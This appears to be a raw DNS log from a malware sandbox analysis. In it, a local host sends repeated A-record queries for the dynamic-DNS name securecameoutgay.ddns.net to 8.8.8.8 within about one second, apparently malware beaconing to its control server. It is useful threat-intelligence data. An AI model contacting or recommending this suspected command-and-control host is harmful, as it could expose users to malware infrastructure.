                                                    Oct 12, 2024 23:05:56.596419096 CEST192.168.2.148.8.8.80x7ba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.603467941 CEST192.168.2.148.8.8.80x7ba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.610054970 CEST192.168.2.148.8.8.80x7ba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.616806030 CEST192.168.2.148.8.8.80x7ba8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.623441935 CEST192.168.2.148.8.8.80xcfd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.629956961 CEST192.168.2.148.8.8.80xcfd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.637274027 CEST192.168.2.148.8.8.80xcfd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.643852949 CEST192.168.2.148.8.8.80xcfd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.650464058 CEST192.168.2.148.8.8.80xcfd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.657489061 CEST192.168.2.148.8.8.80x31cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.664419889 CEST192.168.2.148.8.8.80x31cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.671560049 CEST192.168.2.148.8.8.80x31cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.678349972 CEST192.168.2.148.8.8.80x31cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.686167955 CEST192.168.2.148.8.8.80x31cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.693829060 CEST192.168.2.148.8.8.80x6d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.700849056 CEST192.168.2.148.8.8.80x6d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.707640886 CEST192.168.2.148.8.8.80x6d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.714267015 CEST192.168.2.148.8.8.80x6d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.721038103 CEST192.168.2.148.8.8.80x6d24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.728009939 CEST192.168.2.148.8.8.80x41d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.734729052 CEST192.168.2.148.8.8.80x41d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.741475105 CEST192.168.2.148.8.8.80x41d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.748528957 CEST192.168.2.148.8.8.80x41d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.755248070 CEST192.168.2.148.8.8.80x41d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.762049913 CEST192.168.2.148.8.8.80x81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.768985033 CEST192.168.2.148.8.8.80x81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.776227951 CEST192.168.2.148.8.8.80x81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.783252954 CEST192.168.2.148.8.8.80x81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.789829969 CEST192.168.2.148.8.8.80x81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.796583891 CEST192.168.2.148.8.8.80x3711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.803128958 CEST192.168.2.148.8.8.80x3711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.809957981 CEST192.168.2.148.8.8.80x3711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.816705942 CEST192.168.2.148.8.8.80x3711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.823556900 CEST192.168.2.148.8.8.80x3711Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.830271959 CEST192.168.2.148.8.8.80xf4cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.836844921 CEST192.168.2.148.8.8.80xf4cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.843739986 CEST192.168.2.148.8.8.80xf4cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.850282907 CEST192.168.2.148.8.8.80xf4cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.857040882 CEST192.168.2.148.8.8.80xf4cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.863861084 CEST192.168.2.148.8.8.80x9bbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.870764017 CEST192.168.2.148.8.8.80x9bbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.877532959 CEST192.168.2.148.8.8.80x9bbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.884370089 CEST192.168.2.148.8.8.80x9bbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.891736031 CEST192.168.2.148.8.8.80x9bbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.898206949 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.904583931 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.911540031 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.918203115 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.924838066 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.931528091 CEST192.168.2.148.8.8.80x5c1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.938277006 CEST192.168.2.148.8.8.80x5c1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.944921017 CEST192.168.2.148.8.8.80x5c1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.951919079 CEST192.168.2.148.8.8.80x5c1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.961409092 CEST192.168.2.148.8.8.80x5c1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.968410969 CEST192.168.2.148.8.8.80x8aebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.975280046 CEST192.168.2.148.8.8.80x8aebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.982450008 CEST192.168.2.148.8.8.80x8aebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.989166975 CEST192.168.2.148.8.8.80x8aebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:56.995630980 CEST192.168.2.148.8.8.80x8aebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.002449036 CEST192.168.2.148.8.8.80xf80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.009892941 CEST192.168.2.148.8.8.80xf80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.016608953 CEST192.168.2.148.8.8.80xf80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.023369074 CEST192.168.2.148.8.8.80xf80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.030137062 CEST192.168.2.148.8.8.80xf80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.036905050 CEST192.168.2.148.8.8.80x7c00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.043543100 CEST192.168.2.148.8.8.80x7c00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.050411940 CEST192.168.2.148.8.8.80x7c00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.057056904 CEST192.168.2.148.8.8.80x7c00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.063827038 CEST192.168.2.148.8.8.80x7c00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.070883989 CEST192.168.2.148.8.8.80x9170Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.077455997 CEST192.168.2.148.8.8.80x9170Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.084214926 CEST192.168.2.148.8.8.80x9170Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.090912104 CEST192.168.2.148.8.8.80x9170Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.098630905 CEST192.168.2.148.8.8.80x9170Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.105675936 CEST192.168.2.148.8.8.80xaa26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.112487078 CEST192.168.2.148.8.8.80xaa26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.119410038 CEST192.168.2.148.8.8.80xaa26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.126259089 CEST192.168.2.148.8.8.80xaa26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.132766962 CEST192.168.2.148.8.8.80xaa26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.139779091 CEST192.168.2.148.8.8.80x59ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.146186113 CEST192.168.2.148.8.8.80x59ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.152648926 CEST192.168.2.148.8.8.80x59ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.159276962 CEST192.168.2.148.8.8.80x59ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.165927887 CEST192.168.2.148.8.8.80x59ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.172595024 CEST192.168.2.148.8.8.80x9336Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.179327965 CEST192.168.2.148.8.8.80x9336Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.186069965 CEST192.168.2.148.8.8.80x9336Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.192859888 CEST192.168.2.148.8.8.80x9336Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.199668884 CEST192.168.2.148.8.8.80x9336Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.206487894 CEST192.168.2.148.8.8.80x6c34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.213146925 CEST192.168.2.148.8.8.80x6c34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.219573975 CEST192.168.2.148.8.8.80x6c34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.226394892 CEST192.168.2.148.8.8.80x6c34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.233144045 CEST192.168.2.148.8.8.80x6c34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.239896059 CEST192.168.2.148.8.8.80xd227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.246772051 CEST192.168.2.148.8.8.80xd227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.253839970 CEST192.168.2.148.8.8.80xd227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.262310028 CEST192.168.2.148.8.8.80xd227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.269083977 CEST192.168.2.148.8.8.80xd227Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.276041985 CEST192.168.2.148.8.8.80xcc85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.282545090 CEST192.168.2.148.8.8.80xcc85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.289589882 CEST192.168.2.148.8.8.80xcc85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.296154022 CEST192.168.2.148.8.8.80xcc85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.303050995 CEST192.168.2.148.8.8.80xcc85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.310013056 CEST192.168.2.148.8.8.80x2246Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.317210913 CEST192.168.2.148.8.8.80x2246Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.323729038 CEST192.168.2.148.8.8.80x2246Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.330188036 CEST192.168.2.148.8.8.80x2246Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.336740017 CEST192.168.2.148.8.8.80x2246Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.343573093 CEST192.168.2.148.8.8.80x6b2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.350486040 CEST192.168.2.148.8.8.80x6b2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.357033014 CEST192.168.2.148.8.8.80x6b2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.363441944 CEST192.168.2.148.8.8.80x6b2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.370119095 CEST192.168.2.148.8.8.80x6b2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.377104998 CEST192.168.2.148.8.8.80x8f40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.384116888 CEST192.168.2.148.8.8.80x8f40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.390993118 CEST192.168.2.148.8.8.80x8f40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.397738934 CEST192.168.2.148.8.8.80x8f40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.404437065 CEST192.168.2.148.8.8.80x8f40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.411288023 CEST192.168.2.148.8.8.80x8140Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.417850018 CEST192.168.2.148.8.8.80x8140Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.424505949 CEST192.168.2.148.8.8.80x8140Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.431195974 CEST192.168.2.148.8.8.80x8140Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.437716007 CEST192.168.2.148.8.8.80x8140Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.444786072 CEST192.168.2.148.8.8.80x1e33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.451725960 CEST192.168.2.148.8.8.80x1e33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.459045887 CEST192.168.2.148.8.8.80x1e33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.465845108 CEST192.168.2.148.8.8.80x1e33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.472338915 CEST192.168.2.148.8.8.80x1e33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.479187012 CEST192.168.2.148.8.8.80x3cc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.485904932 CEST192.168.2.148.8.8.80x3cc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.492634058 CEST192.168.2.148.8.8.80x3cc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.499126911 CEST192.168.2.148.8.8.80x3cc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.505810976 CEST192.168.2.148.8.8.80x3cc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.513573885 CEST192.168.2.148.8.8.80xb9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.519846916 CEST192.168.2.148.8.8.80xb9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.526290894 CEST192.168.2.148.8.8.80xb9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.532979012 CEST192.168.2.148.8.8.80xb9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.540088892 CEST192.168.2.148.8.8.80xb9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.546894073 CEST192.168.2.148.8.8.80x7ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.553591967 CEST192.168.2.148.8.8.80x7ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.560455084 CEST192.168.2.148.8.8.80x7ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.567043066 CEST192.168.2.148.8.8.80x7ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.573627949 CEST192.168.2.148.8.8.80x7ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.580223083 CEST192.168.2.148.8.8.80x38e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.587002039 CEST192.168.2.148.8.8.80x38e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.593553066 CEST192.168.2.148.8.8.80x38e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.600203037 CEST192.168.2.148.8.8.80x38e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.607067108 CEST192.168.2.148.8.8.80x38e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.614034891 CEST192.168.2.148.8.8.80x69c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.620589972 CEST192.168.2.148.8.8.80x69c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.627115011 CEST192.168.2.148.8.8.80x69c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.633784056 CEST192.168.2.148.8.8.80x69c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.640688896 CEST192.168.2.148.8.8.80x69c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.647703886 CEST192.168.2.148.8.8.80xd055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.654655933 CEST192.168.2.148.8.8.80xd055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.662050009 CEST192.168.2.148.8.8.80xd055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.668941021 CEST192.168.2.148.8.8.80xd055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.675873995 CEST192.168.2.148.8.8.80xd055Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.682549953 CEST192.168.2.148.8.8.80xca34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.690407038 CEST192.168.2.148.8.8.80xca34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.698196888 CEST192.168.2.148.8.8.80xca34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.704933882 CEST192.168.2.148.8.8.80xca34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.711442947 CEST192.168.2.148.8.8.80xca34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.718235970 CEST192.168.2.148.8.8.80xd7c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.724975109 CEST192.168.2.148.8.8.80xd7c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.731928110 CEST192.168.2.148.8.8.80xd7c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.738368034 CEST192.168.2.148.8.8.80xd7c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.745095968 CEST192.168.2.148.8.8.80xd7c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.751986980 CEST192.168.2.148.8.8.80x2bd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.758572102 CEST192.168.2.148.8.8.80x2bd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.765153885 CEST192.168.2.148.8.8.80x2bd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.771955013 CEST192.168.2.148.8.8.80x2bd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.778692961 CEST192.168.2.148.8.8.80x2bd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.785146952 CEST192.168.2.148.8.8.80xa159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.791897058 CEST192.168.2.148.8.8.80xa159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.798685074 CEST192.168.2.148.8.8.80xa159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.805421114 CEST192.168.2.148.8.8.80xa159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.811830997 CEST192.168.2.148.8.8.80xa159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.818694115 CEST192.168.2.148.8.8.80xc378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.825409889 CEST192.168.2.148.8.8.80xc378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.831953049 CEST192.168.2.148.8.8.80xc378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.838588953 CEST192.168.2.148.8.8.80xc378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.844978094 CEST192.168.2.148.8.8.80xc378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.851758957 CEST192.168.2.148.8.8.80x9cffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.858422041 CEST192.168.2.148.8.8.80x9cffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.864893913 CEST192.168.2.148.8.8.80x9cffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
